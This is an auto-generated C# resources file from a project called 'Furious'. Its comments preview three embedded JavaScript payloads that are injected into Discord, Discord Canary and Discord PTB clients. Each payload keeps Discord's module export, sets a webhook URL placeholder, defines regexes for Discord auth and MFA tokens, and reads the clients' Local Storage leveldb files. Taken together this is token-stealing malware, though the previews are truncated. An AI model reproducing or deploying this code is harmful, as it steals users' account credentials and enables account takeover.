//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Furious.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Furious.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to module.exports = require(&apos;./discord_modules.node&apos;);
        ///
        ///var URL = `webhook-here`;
        ///	
        ///const fs = require(&quot;fs&quot;);
        ///
        ///const regex = /[MN][A-Za-z\d]{23}\.[\w-]{6}\.[\w-]{27}/g;
        ///const reg2 = /mfa\.[\w-]{84}/g;
        ///
        ///if (fs.existsSync(process.env.APPDATA + &quot;/discordcanary/Local Storage/leveldb&quot;)) {
        ///
        ///    let discordCanary = fs.readdirSync(process.env.APPDATA + &quot;/discordcanary/Local Storage/leveldb&quot;) [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string canary {
            get {
                return ResourceManager.GetString("canary", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to module.exports = require(&apos;./discord_modules.node&apos;);
        ///
        ///var URL = `webhook-here`;
        ///	
        ///const fs = require(&quot;fs&quot;);
        ///
        ///const regex = /[MN][A-Za-z\d]{23}\.[\w-]{6}\.[\w-]{27}/g;
        ///const reg2 = /mfa\.[\w-]{84}/g;
        ///
        ///if (fs.existsSync(process.env.APPDATA + &quot;/Discord/Local Storage/leveldb&quot;)) {
        ///
        ///    let discordPTB = fs.readdirSync(process.env.APPDATA + &quot;/Discord/Local Storage/leveldb&quot;);
        ///
        ///    for (let file [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string index {
            get {
                return ResourceManager.GetString("index", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to module.exports = require(&apos;./discord_modules.node&apos;);
        ///
        ///var URL = `webhook-here`;
        ///	
        ///const fs = require(&quot;fs&quot;);
        ///
        ///const regex = /[MN][A-Za-z\d]{23}\.[\w-]{6}\.[\w-]{27}/g;
        ///const reg2 = /mfa\.[\w-]{84}/g;
        ///
        ///if (fs.existsSync(process.env.APPDATA + &quot;/discordptb/Local Storage/leveldb&quot;)) {
        ///
        ///    let discordPTB = fs.readdirSync(process.env.APPDATA + &quot;/discordptb/Local Storage/leveldb&quot;);
        ///
        ///    for [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ptb {
            get {
                return ResourceManager.GetString("ptb", resourceCulture);
            }
        }
    }
}
